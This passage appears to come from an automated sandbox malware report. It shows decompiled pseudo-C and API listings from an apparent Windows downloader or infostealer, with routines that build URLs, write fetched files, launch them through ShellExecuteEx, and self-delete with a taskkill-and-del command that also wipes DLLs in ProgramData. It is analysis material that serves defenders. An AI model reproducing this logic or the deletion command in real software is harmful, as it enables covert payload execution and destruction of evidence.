                                                                    					lstrcatA( &_v1024, _v8176);
                                                                    					_push("://");
                                                                    				} else {
                                                                    					lstrcatA( &_v2024, "80");
                                                                    					_t169 =  *0x4442f0 - 0x10;
                                                                    					if( *0x4442f0 >= 0x10) {
                                                                    						_t150 =  *0x4442dc; // 0x4be1588
                                                                    					}
                                                                    					lstrcatA( &_v3024, _t150);
                                                                    					_push("http://");
                                                                    				}
                                                                    				lstrcatA( &_v1024, ??);
                                                                    				_t145 = E00414C66(0,  &_v8052, _t144, _t150, _t169);
                                                                    				_v8 = 0;
                                                                    				_v8112 = E00408441( &_v8108);
                                                                    				_v8 = 1;
                                                                    				_t90 = E00408392( &_v8080);
                                                                    				_v8 = 2;
                                                                    				if( *((intOrPtr*)(_t145 + 0x14)) >= 0x10) {
                                                                    					_t145 =  *_t145;
                                                                    				}
                                                                    				_t127 = _v8112;
                                                                    				if( *((intOrPtr*)(_t127 + 0x14)) >= 0x10) {
                                                                    					_t127 =  *_t127;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t90 + 0x14)) >= 0x10) {
                                                                    					_t90 =  *_t90;
                                                                    				}
                                                                    				_push(_t145);
                                                                    				_push(_t127);
                                                                    				_push(_t90);
                                                                    				_push(_v8116);
                                                                    				_push(_v8120);
                                                                    				_push( &_v2024);
                                                                    				_push(E0041EA23());
                                                                    				_push( &_v3024);
                                                                    				_t94 = E0040D87A( &_v1024, _t141);
                                                                    				_t158 = _t157 + 0x1c;
                                                                    				lstrcatA( &_v8024, _t94);
                                                                    				E00404354( &_v8080, 1, 0);
                                                                    				E00404354( &_v8108, 1, 0);
                                                                    				_v8 = _v8 | 0xffffffff;
                                                                    				E00404354( &_v8052, 1, 0);
                                                                    				_t133 = 0x3c;
                                                                    				_t100 =  &_v8180;
                                                                    				do {
                                                                    					 *_t100 = 0;
                                                                    					_t100 = _t100 + 1;
                                                                    					_t133 = _t133 - 1;
                                                                    				} while (_t133 != 0);
                                                                    				_t134 = 0x3e8;
                                                                    				_t142 = 0x3e8;
                                                                    				_t101 =  &_v2024;
                                                                    				do {
                                                                    					 *_t101 = 0;
                                                                    					_t101 = _t101 + 1;
                                                                    					_t142 = _t142 - 1;
                                                                    				} while (_t142 != 0);
                                                                    				_t143 = 0x3e8;
                                                                    				_t102 =  &_v3024;
                                                                    				do {
                                                                    					 *_t102 = 0;
                                                                    					_t102 = _t102 + 1;
                                                                    					_t143 = _t143 - 1;
                                                                    				} while (_t143 != 0);
                                                                    				_t103 =  &_v1024;
                                                                    				do {
                                                                    					 *_t103 = 0;
                                                                    					_t103 = _t103 + 1;
                                                                    					_t134 = _t134 - 1;
                                                                    				} while (_t134 != 0);
                                                                    				_t105 =  *0x446320( &_v8024);
                                                                    				_t178 = _t105 - 2;
                                                                    				if(_t105 <= 2) {
                                                                    					_t107 =  *0x446320( &_v8024);
                                                                    					 *0x4465f4 = 1;
                                                                    					__eflags = _t107 - 2;
                                                                    					if(_t107 != 2) {
                                                                    						 *0x4465f4 = 0;
                                                                    					}
                                                                    				} else {
                                                                    					_t159 = _t158 - 0x1c;
                                                                    					_t139 = _t159;
                                                                    					_v8112 = _t159;
                                                                    					 *((intOrPtr*)(_t139 + 0x14)) = 0xf;
                                                                    					 *((intOrPtr*)(_t139 + 0x10)) = 0;
                                                                    					 *_t139 = 0;
                                                                    					E00404331(_t139,  &_v8024);
                                                                    					E00408464(0, _t143, _t145, 1, _t178);
                                                                    					 *0x4465f4 = 1;
                                                                    				}
                                                                    				 *[fs:0x0] = _v16;
                                                                    				_pop(_t146);
                                                                    				_pop(_t155);
                                                                    				_pop(_t118);
                                                                    				return E0041DA9B(0, _t118, _v24 ^ _t156, _t143, _t146, _t155);
                                                                    			}

                                                                    APIs
                                                                    • InternetCrackUrlA.WININET(04BE1588,00000000,?), ref: 0040ADA7
                                                                    • lstrcatA.KERNEL32(?,0043EC20), ref: 0040ADBD
                                                                    • lstrcatA.KERNEL32(?,004442DC), ref: 0040ADDA
                                                                    • wsprintfA.USER32 ref: 0040ADFB
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040AE11
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040AE24
                                                                    • lstrcatA.KERNEL32(?,://), ref: 0040AE36
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040AEC8
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • lstrlen.KERNEL32(?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040AF3F
                                                                    • lstrlen.KERNEL32(?), ref: 0040AF7E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$lstrlen$CrackInternet_memmovewsprintf
                                                                    • String ID: ://$http://
                                                                    • API String ID: 3481673703-3772126531
                                                                    • Opcode ID: 30765006a9ce84e9c53db51ecdb021492593b6aaf4c80a5fbbc572c231c0e284
                                                                    • Instruction ID: 96e7ee55b5b0f33d58b683fa1b1e3b32b82c02d2bd62b2cadccec16d22c8602c
                                                                    • Opcode Fuzzy Hash: 30765006a9ce84e9c53db51ecdb021492593b6aaf4c80a5fbbc572c231c0e284
                                                                    • Instruction Fuzzy Hash: 1991AF7190025A9FDB15DF54DD44AEEBB78EF1A304F1001FAE40AA7291DB385E84CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 97%
                                                                    			E00407E8D(void* __ecx, void* __edx, long _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				signed int _v8;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				struct _FILETIME _v560;
                                                                    				struct _FILETIME _v568;
                                                                    				struct _FILETIME _v576;
                                                                    				unsigned int _v580;
                                                                    				char _v844;
                                                                    				char _v845;
                                                                    				signed int _v852;
                                                                    				void* _v856;
                                                                    				long _v860;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t86;
                                                                    				intOrPtr _t89;
                                                                    				signed int _t97;
                                                                    				void* _t100;
                                                                    				void* _t101;
                                                                    				void* _t105;
                                                                    				void* _t108;
                                                                    				signed char _t112;
                                                                    				long _t113;
                                                                    				void* _t123;
                                                                    				int _t135;
                                                                    				long _t143;
                                                                    				long _t154;
                                                                    				long _t157;
                                                                    				void* _t163;
                                                                    				signed int _t169;
                                                                    
                                                                    				_t163 = __edx;
                                                                    				_t86 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t86 ^ _t169;
                                                                    				_t143 = __ecx;
                                                                    				_v856 = __ecx;
                                                                    				_v852 = _a8;
                                                                    				if(_a16 == 3) {
                                                                    					_t89 =  *((intOrPtr*)(__ecx + 4));
                                                                    					_t166 = _a4;
                                                                    					__eflags = _t166 - _t89;
                                                                    					if(_t166 == _t89) {
                                                                    						L13:
                                                                    						_t166 = E004074FF( *_t143, _a12, _v852,  &_v845);
                                                                    						__eflags = _t166;
                                                                    						if(_t166 <= 0) {
                                                                    							_t164 =  *_t143;
                                                                    							E0040772D( *_t143);
                                                                    							_t25 = _t143 + 4;
                                                                    							 *_t25 =  *(_t143 + 4) | 0xffffffff;
                                                                    							__eflags =  *_t25;
                                                                    						}
                                                                    						__eflags = _v845;
                                                                    						if(_v845 == 0) {
                                                                    							__eflags = _t166;
                                                                    							if(_t166 <= 0) {
                                                                    								__eflags = _t166 - 0xffffff96;
                                                                    								_t97 = ((0 | _t166 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                                    							} else {
                                                                    								_t97 = 0x600;
                                                                    							}
                                                                    							goto L62;
                                                                    						} else {
                                                                    							L16:
                                                                    							_t97 = 0;
                                                                    							L62:
                                                                    							return E0041DA9B(_t97, _t143, _v8 ^ _t169, _t163, _t164, _t166);
                                                                    						}
                                                                    					}
                                                                    					__eflags = _t89 - 0xffffffff;
                                                                    					if(_t89 != 0xffffffff) {
                                                                    						_t164 =  *__ecx;
                                                                    						E0040772D( *__ecx);
                                                                    					}
                                                                    					_t100 =  *_t143;
                                                                    					 *(_t143 + 4) =  *(_t143 + 4) | 0xffffffff;
                                                                    					__eflags = _t166 -  *((intOrPtr*)(_t100 + 4));
                                                                    					if(_t166 >=  *((intOrPtr*)(_t100 + 4))) {
                                                                    						L3:
                                                                    						_t97 = 0x10000;
                                                                    						goto L62;
                                                                    					}
                                                                    					__eflags = _t166 -  *((intOrPtr*)(_t100 + 0x10));
                                                                    					if(_t166 <  *((intOrPtr*)(_t100 + 0x10))) {
                                                                    						E00407035(_t100);
                                                                    						_t166 = _a4;
                                                                    					}
                                                                    					_t101 =  *_t143;
                                                                    					__eflags =  *((intOrPtr*)(_t101 + 0x10)) - _t166;
                                                                    					if( *((intOrPtr*)(_t101 + 0x10)) >= _t166) {
                                                                    						L12:
                                                                    						E004073AA( *_t143,  *((intOrPtr*)(_t143 + 0x138)));
                                                                    						_t154 = _v856;
                                                                    						 *((intOrPtr*)(_t154 + 4)) = _a4;
                                                                    						_t143 = _t154;
                                                                    						goto L13;
                                                                    					} else {
                                                                    						do {
                                                                    							E0040706A( *_t143);
                                                                    							_t105 =  *_t143;
                                                                    							__eflags =  *((intOrPtr*)(_t105 + 0x10)) - _a4;
                                                                    						} while ( *((intOrPtr*)(_t105 + 0x10)) < _a4);
                                                                    						goto L12;
                                                                    					}
                                                                    				}
                                                                    				if(_a16 == 2 || _a16 == 1) {
                                                                    					__eflags =  *(_t143 + 4) - 0xffffffff;
                                                                    					if( *(_t143 + 4) != 0xffffffff) {
                                                                    						E0040772D( *_t143);
                                                                    					}
                                                                    					_t166 =  *_t143;
                                                                    					_t164 = _a4;
                                                                    					 *(_t143 + 4) =  *(_t143 + 4) | 0xffffffff;
                                                                    					__eflags = _t164 -  *((intOrPtr*)(_t166 + 4));
                                                                    					if(_t164 >=  *((intOrPtr*)(_t166 + 4))) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						__eflags = _t164 -  *((intOrPtr*)(_t166 + 0x10));
                                                                    						if(_t164 <  *((intOrPtr*)(_t166 + 0x10))) {
                                                                    							E00407035(_t166);
                                                                    						}
                                                                    						while(1) {
                                                                    							_t108 =  *_t143;
                                                                    							__eflags =  *((intOrPtr*)(_t108 + 0x10)) - _t164;
                                                                    							if( *((intOrPtr*)(_t108 + 0x10)) >= _t164) {
                                                                    								break;
                                                                    							}
                                                                    							_t166 =  *_t143;
                                                                    							E0040706A( *_t143);
                                                                    						}
                                                                    						_t164 = _v856;
                                                                    						_t143 =  &_v844;
                                                                    						E0040781A(_t143, _t164, _t163, _t164);
                                                                    						_t112 = _v580 >> 4;
                                                                    						__eflags = _t112 & 0x00000001;
                                                                    						if((_t112 & 0x00000001) != 0) {
                                                                    							goto L16;
                                                                    						}
                                                                    						__eflags = _a16 - 1;
                                                                    						_v540 = 0;
                                                                    						if(_a16 != 1) {
                                                                    							_t166 = _v852;
                                                                    							_t113 =  *_t166;
                                                                    							_t157 = _t166;
                                                                    							while(1) {
                                                                    								__eflags = _t113;
                                                                    								if(_t113 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eflags = _t113 - 0x2f;
                                                                    								if(_t113 == 0x2f) {
                                                                    									L33:
                                                                    									_t143 = _t157 + 1;
                                                                    									L34:
                                                                    									_t157 = _t157 + 1;
                                                                    									__eflags = _t157;
                                                                    									_t113 =  *_t157;
                                                                    									continue;
                                                                    								}
                                                                    								__eflags = _t113 - 0x5c;
                                                                    								if(_t113 != 0x5c) {
                                                                    									goto L34;
                                                                    								}
                                                                    								goto L33;
                                                                    							}
                                                                    							E0041E427( &_v276, _t166, 0x104);
                                                                    							__eflags = _t143 - _t166;
                                                                    							if(_t143 != _t166) {
                                                                    								 *((char*)(_t169 + _t143 - _t166 - 0x110)) = 0;
                                                                    								__eflags = _v276 - 0x2f;
                                                                    								if(_v276 == 0x2f) {
                                                                    									L46:
                                                                    									wsprintfA( &_v540, "%s%s",  &_v276, _t143);
                                                                    									L39:
                                                                    									__eflags = 0;
                                                                    									_t123 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
                                                                    									L40:
                                                                    									_v856 = _t123;
                                                                    									__eflags = _t123 - 0xffffffff;
                                                                    									if(_t123 != 0xffffffff) {
                                                                    										_t146 =  *_t164;
                                                                    										E004073AA( *_t164,  *((intOrPtr*)(_t164 + 0x138)));
                                                                    										__eflags =  *(_t164 + 0x13c);
                                                                    										_t166 = 0x4000;
                                                                    										if(__eflags == 0) {
                                                                    											 *(_t164 + 0x13c) = E0041D05B(_t146, _t163, _t164, 0x4000, __eflags, 0x4000);
                                                                    										}
                                                                    										_t66 =  &_v852;
                                                                    										 *_t66 = _v852 & 0x00000000;
                                                                    										__eflags =  *_t66;
                                                                    										while(1) {
                                                                    											_t143 = E004074FF( *_t164, _t166,  *(_t164 + 0x13c),  &_v845);
                                                                    											__eflags = _t143 - 0xffffff96;
                                                                    											if(_t143 == 0xffffff96) {
                                                                    												break;
                                                                    											}
                                                                    											__eflags = _t143;
                                                                    											if(__eflags < 0) {
                                                                    												L56:
                                                                    												_v852 = 0x5000000;
                                                                    												L57:
                                                                    												E0040772D(_t164);
                                                                    												__eflags = _v852;
                                                                    												if(_v852 == 0) {
                                                                    													SetFileTime(_v856,  &_v568,  &_v576,  &_v560);
                                                                    												}
                                                                    												__eflags = _a16 - 1;
                                                                    												if(_a16 != 1) {
                                                                    													CloseHandle(_v856);
                                                                    												}
                                                                    												_t97 = _v852;
                                                                    												goto L62;
                                                                    											}
                                                                    											if(__eflags <= 0) {
                                                                    												L54:
                                                                    												__eflags = _v845;
                                                                    												if(_v845 != 0) {
                                                                    													goto L57;
                                                                    												}
                                                                    												__eflags = _t143;
                                                                    												if(_t143 != 0) {
                                                                    													continue;
                                                                    												}
                                                                    												goto L56;
                                                                    											}
                                                                    											_t135 = WriteFile(_v856,  *(_t164 + 0x13c), _t143,  &_v860, 0);
                                                                    											__eflags = _t135;
                                                                    											if(_t135 == 0) {
                                                                    												_v852 = 0x400;
                                                                    												goto L57;
                                                                    											}
                                                                    											goto L54;
                                                                    										}
                                                                    										_v852 = 0x1000;
                                                                    										goto L57;
                                                                    									}
                                                                    									_t97 = 0x200;
                                                                    									goto L62;
                                                                    								}
                                                                    								__eflags = _v276 - 0x5c;
                                                                    								if(_v276 == 0x5c) {
                                                                    									goto L46;
                                                                    								}
                                                                    								__eflags = _v276;
                                                                    								if(_v276 == 0) {
                                                                    									L38:
                                                                    									wsprintfA( &_v540, "%s%s%s", _t164 + 0x140,  &_v276, _t143);
                                                                    									goto L39;
                                                                    								}
                                                                    								__eflags = _v275 - 0x3a;
                                                                    								if(_v275 != 0x3a) {
                                                                    									goto L38;
                                                                    								}
                                                                    								goto L46;
                                                                    							}
                                                                    							_v276 = 0;
                                                                    							goto L38;
                                                                    						}
                                                                    						_t123 = _v852;
                                                                    						goto L40;
                                                                    					}
                                                                    				} else {
                                                                    					goto L3;
                                                                    				}
                                                                    			}




































                                                                    APIs
                                                                    • __fassign.LIBCMT ref: 0040803F
                                                                    • wsprintfA.USER32 ref: 0040806D
                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000), ref: 0040808F
                                                                    • wsprintfA.USER32 ref: 004080F2
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040816F
                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 004081BB
                                                                    • CloseHandle.KERNEL32(?), ref: 004081CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite__fassign
                                                                    • String ID: %s%s$%s%s%s$:$\
                                                                    • API String ID: 3651047468-1100577047
                                                                    • Opcode ID: d5ab2499192fcd582bce1979857674210668997074c52868ae46cfbfd23cd73f
                                                                    • Instruction ID: bafdb481dc1f29af2d9388862325addfc2d1c1539a519b4d1f2314e885e39751
                                                                    • Opcode Fuzzy Hash: d5ab2499192fcd582bce1979857674210668997074c52868ae46cfbfd23cd73f
                                                                    • Instruction Fuzzy Hash: 31A1A0319046189BDF259F24CD847EA77B8AF05314F0401FBE554BB2D1CB78AE89CB9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00408464(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* __ebp;
                                                                    				signed int _t27;
                                                                    				CHAR* _t31;
                                                                    				short _t32;
                                                                    				char* _t33;
                                                                    				void* _t35;
                                                                    				void* _t37;
                                                                    				void* _t40;
                                                                    				CHAR* _t55;
                                                                    				char* _t58;
                                                                    				void* _t61;
                                                                    				void* _t62;
                                                                    				void* _t71;
                                                                    				void* _t72;
                                                                    				char* _t74;
                                                                    				void* _t75;
                                                                    				intOrPtr _t78;
                                                                    				void* _t79;
                                                                    				intOrPtr _t80;
                                                                    				CHAR* _t82;
                                                                    				void* _t84;
                                                                    				void* _t85;
                                                                    				void* _t86;
                                                                    				void* _t89;
                                                                    
                                                                    				_t73 = __edi;
                                                                    				_t72 = __edx;
                                                                    				_t85 = _t84 - 0x3e8;
                                                                    				_t82 = _t85 - 4;
                                                                    				_t27 =  *0x443674; // 0x393162b1
                                                                    				_t82[0x3e8] = _t27 ^ _t82;
                                                                    				_push(0x44);
                                                                    				E004207D5(E00433947, __ebx, __edi, __esi);
                                                                    				_t78 = 1;
                                                                    				 *((intOrPtr*)(_t82 - 4)) = 0;
                                                                    				 *0x4465f0 = 1;
                                                                    				_t62 = 0x3e8;
                                                                    				_t31 = _t82;
                                                                    				do {
                                                                    					 *_t31 = 0;
                                                                    					_t31 =  &(_t31[1]);
                                                                    					_t62 = _t62 - 1;
                                                                    				} while (_t62 != 0);
                                                                    				_t32 = 0x3b;
                                                                    				 *((short*)(_t82 - 0x10)) = _t32;
                                                                    				_t33 = _t82[0x3f4];
                                                                    				if(_t82[0x408] < 0x10) {
                                                                    					_t33 =  &(_t82[0x3f4]);
                                                                    				}
                                                                    				_t74 = E0041E87C(0, _t72, _t73, _t33, _t82 - 0x10, _t82 - 0x14);
                                                                    				_t86 = _t85 + 0xc;
                                                                    				if(_t74 != 0) {
                                                                    					_t80 = 0x3c;
                                                                    					do {
                                                                    						_t37 =  *0x446320(_t74);
                                                                    						_t95 = _t37 - 5;
                                                                    						if(_t37 > 5) {
                                                                    							lstrcatA(_t82,  *0x445fe0);
                                                                    							_t40 = 0x14;
                                                                    							lstrcatA(_t82, E00415EF6(_t40, _t95));
                                                                    							lstrcatA(_t82,  *0x445e3c);
                                                                    							E0040D708(_t74, _t72);
                                                                    							E00426300(_t82 - 0x50, 0, _t80);
                                                                    							 *(_t82 - 0x40) = _t82;
                                                                    							 *((intOrPtr*)(_t82 - 0x50)) = _t80;
                                                                    							 *((intOrPtr*)(_t82 - 0x4c)) = 0;
                                                                    							 *((intOrPtr*)(_t82 - 0x48)) = 0;
                                                                    							 *(_t82 - 0x44) = "open";
                                                                    							 *((intOrPtr*)(_t82 - 0x3c)) = 0x43c8d8;
                                                                    							 *((intOrPtr*)(_t82 - 0x38)) = 0;
                                                                    							 *((intOrPtr*)(_t82 - 0x34)) = 5;
                                                                    							 *((intOrPtr*)(_t82 - 0x30)) = 0;
                                                                    							 *0x44648c(_t82 - 0x50, _t82);
                                                                    							E00426300(_t82 - 0x50, 0, _t80);
                                                                    							_t89 = _t86 + 0x1c;
                                                                    							_t71 = 0x3e8;
                                                                    							_t55 = _t82;
                                                                    							do {
                                                                    								 *_t55 = 0;
                                                                    								_t55 =  &(_t55[1]);
                                                                    								_t71 = _t71 - 1;
                                                                    							} while (_t71 != 0);
                                                                    							_t58 = E0041E87C(0, _t72, _t74, 0, _t82 - 0x10, _t82 - 0x14);
                                                                    							_t86 = _t89 + 0xc;
                                                                    							_t74 = _t58;
                                                                    						}
                                                                    					} while (_t74 != 0);
                                                                    					_t78 = 1;
                                                                    				}
                                                                    				 *0x4465f8 = _t78;
                                                                    				_t35 = E00404354( &(_t82[0x3f4]), _t78, 0);
                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
                                                                    				_pop(_t75);
                                                                    				_pop(_t79);
                                                                    				_pop(_t61);
                                                                    				return E0041DA9B(_t35, _t61, _t82[0x3e8] ^ _t82, _t72, _t75, _t79);
                                                                    			}




























                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00408483
                                                                    • _strtok_s.LIBCMT ref: 004084C9
                                                                    • lstrlen.KERNEL32(00000000,?,?,00000044), ref: 004084DF
                                                                    • lstrcatA.KERNEL32(00000000,?,?,00000044), ref: 004084F8
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,00000044), ref: 0040850B
                                                                    • lstrcatA.KERNEL32(00000000,?,?,00000044), ref: 0040851B
                                                                    • _memset.LIBCMT ref: 00408532
                                                                    • ShellExecuteEx.SHELL32(?), ref: 00408568
                                                                    • _memset.LIBCMT ref: 00408574
                                                                    • _strtok_s.LIBCMT ref: 00408593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset_strtok_s$ExecuteH_prolog3Shelllstrlen
                                                                    • String ID: open
                                                                    • API String ID: 918602802-2758837156
                                                                    • Opcode ID: 3d5ef9c5d50f0dd0700dd2f7db8955548b2b3cb180e2b399da2dfe38f5dd0dc2
                                                                    • Instruction ID: d56ce09891c1524cae434c557d9be1ba18f910f8940cc535b8fdc1bba9f7232f
                                                                    • Opcode Fuzzy Hash: 3d5ef9c5d50f0dd0700dd2f7db8955548b2b3cb180e2b399da2dfe38f5dd0dc2
                                                                    • Instruction Fuzzy Hash: 4E416CB6900259ABDF15DF91DC84AEE77BCFB09314F40043EE909E7280EB3896498B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E004164A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* __ebp;
                                                                    				signed int _t38;
                                                                    				void* _t43;
                                                                    				void* _t45;
                                                                    				void* _t47;
                                                                    				void* _t49;
                                                                    				void* _t51;
                                                                    				void* _t53;
                                                                    				intOrPtr _t64;
                                                                    				void* _t67;
                                                                    				void* _t73;
                                                                    				void* _t74;
                                                                    				void* _t87;
                                                                    				intOrPtr _t91;
                                                                    				void* _t92;
                                                                    				void* _t96;
                                                                    				signed int _t97;
                                                                    				void* _t99;
                                                                    
                                                                    				_t87 = __edx;
                                                                    				_t97 = _t99 - 0xc0;
                                                                    				_t38 =  *0x443674; // 0x393162b1
                                                                    				 *(_t97 + 0xc4) = _t38 ^ _t97;
                                                                    				E004207D5(E004340B8, __ebx, __edi, __esi);
                                                                    				_t43 = E00416233(_t97 + 0x1c, GetCurrentProcessId());
                                                                    				_t74 = 0x3c;
                                                                    				 *((intOrPtr*)(_t97 - 4)) = 0;
                                                                    				_push(GetCurrentProcessId());
                                                                    				_t45 = E004163DF(_t97 + 0x54);
                                                                    				 *((char*)(_t97 - 4)) = 1;
                                                                    				_t47 = E00404697(_t74, _t97 + 0x70, "/c taskkill /im ", _t45);
                                                                    				 *((char*)(_t97 - 4)) = 2;
                                                                    				_t49 = E0040C20F(_t74, _t97 + 0x8c, _t47, " /f & timeout /t 6 & del /f /q \"");
                                                                    				 *((char*)(_t97 - 4)) = 3;
                                                                    				_t51 = E004046CE(_t43, _t97);
                                                                    				 *((char*)(_t97 - 4)) = 4;
                                                                    				_t53 = E0040C20F(_t49, _t97 + 0x38, _t51, "\" & del C:\\ProgramData\\*.dll");
                                                                    				 *((char*)(_t97 - 4)) = 5;
                                                                    				E0040C20F(_t49, _t97 + 0xa8, _t53, " & exit");
                                                                    				E00404354(_t97 + 0x38, 1, 0);
                                                                    				E00404354(_t97, 1, 0);
                                                                    				E00404354(_t97 + 0x8c, 1, 0);
                                                                    				E00404354(_t97 + 0x70, 1, 0);
                                                                    				E00404354(_t97 + 0x54, 1, 0);
                                                                    				 *((char*)(_t97 - 4)) = 0xc;
                                                                    				E00404354(_t97 + 0x1c, 1, 0);
                                                                    				_t91 = 0x3c;
                                                                    				E00426300(_t97 - 0x48, 0, _t91);
                                                                    				_t64 =  *((intOrPtr*)(_t97 + 0xa8));
                                                                    				 *((intOrPtr*)(_t97 - 0x48)) = _t91;
                                                                    				 *((intOrPtr*)(_t97 - 0x44)) = 0;
                                                                    				 *((intOrPtr*)(_t97 - 0x40)) = 0;
                                                                    				 *(_t97 - 0x3c) = "open";
                                                                    				 *(_t97 - 0x38) = "C:\\Windows\\System32\\cmd.exe";
                                                                    				if( *((intOrPtr*)(_t97 + 0xbc)) < 0x10) {
                                                                    					_t64 = _t97 + 0xa8;
                                                                    				}
                                                                    				 *((intOrPtr*)(_t97 - 0x34)) = _t64;
                                                                    				 *((intOrPtr*)(_t97 - 0x30)) = 0;
                                                                    				 *((intOrPtr*)(_t97 - 0x2c)) = 0;
                                                                    				 *((intOrPtr*)(_t97 - 0x28)) = 0;
                                                                    				 *0x44648c(_t97 - 0x48);
                                                                    				_t67 = E00404354(_t97 + 0xa8, 1, 0);
                                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
                                                                    				_pop(_t92);
                                                                    				_pop(_t96);
                                                                    				_pop(_t73);
                                                                    				return E0041DA9B(_t67, _t73,  *(_t97 + 0xc4) ^ _t97, _t87, _t92, _t96);
                                                                    			}






















                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004164C0
                                                                    • GetCurrentProcessId.KERNEL32(0000003C), ref: 004164C5
                                                                      • Part of subcall function 00416233: OpenProcess.KERNEL32(00000410,00000000,0040B15A,00000000,00000001), ref: 0041625A
                                                                      • Part of subcall function 00416233: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00416274
                                                                      • Part of subcall function 00416233: CloseHandle.KERNEL32(00000000), ref: 0041627B
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004164DC
                                                                      • Part of subcall function 004163DF: _memset.LIBCMT ref: 00416420
                                                                      • Part of subcall function 004163DF: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 00416432
                                                                      • Part of subcall function 004163DF: EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00416449
                                                                      • Part of subcall function 004163DF: GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00416460
                                                                      • Part of subcall function 004163DF: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00416467
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • _memset.LIBCMT ref: 0041659D
                                                                    • ShellExecuteEx.SHELL32(?), ref: 004165E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleModuleNameOpen_memset$BaseEnumExecuteFileH_prolog3ModulesShell_memmove
                                                                    • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe$open
                                                                    • API String ID: 1885640224-2169176781
                                                                    • Opcode ID: 57fc7d6f66a865e5756a830063db229e5885611e16897983d06949847bbf6275
                                                                    • Instruction ID: 9c3fa8660bc09bfe6a6b27ce70cf6555235a06a634c8491fb7bd894cd3fe12af
                                                                    • Opcode Fuzzy Hash: 57fc7d6f66a865e5756a830063db229e5885611e16897983d06949847bbf6275
                                                                    • Instruction Fuzzy Hash: 3B4184B2900258EBDB25EF99DC85FCE7BACAF55304F10402FF916A3181DB785648CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E00409404(CHAR* __ecx, void* __edx, long _a4) {
                                                                    				signed int _v12;
                                                                    				struct _GENERIC_MAPPING _v28;
                                                                    				struct _PRIVILEGE_SET _v48;
                                                                    				long _v52;
                                                                    				void* _v56;
                                                                    				void* _v60;
                                                                    				int _v64;
                                                                    				long _v68;
                                                                    				long _v72;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t37;
                                                                    				signed char _t65;
                                                                    				void* _t71;
                                                                    				CHAR* _t72;
                                                                    				struct _SECURITY_DESCRIPTOR* _t74;
                                                                    				signed int _t75;
                                                                    
                                                                    				_t71 = __edx;
                                                                    				_t37 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t37 ^ _t75;
                                                                    				_t65 = 0;
                                                                    				_t72 = __ecx;
                                                                    				_v52 = 0;
                                                                    				if(GetFileSecurityA(__ecx, 7, 0, 0,  &_v52) == 0 && GetLastError() == 0x7a) {
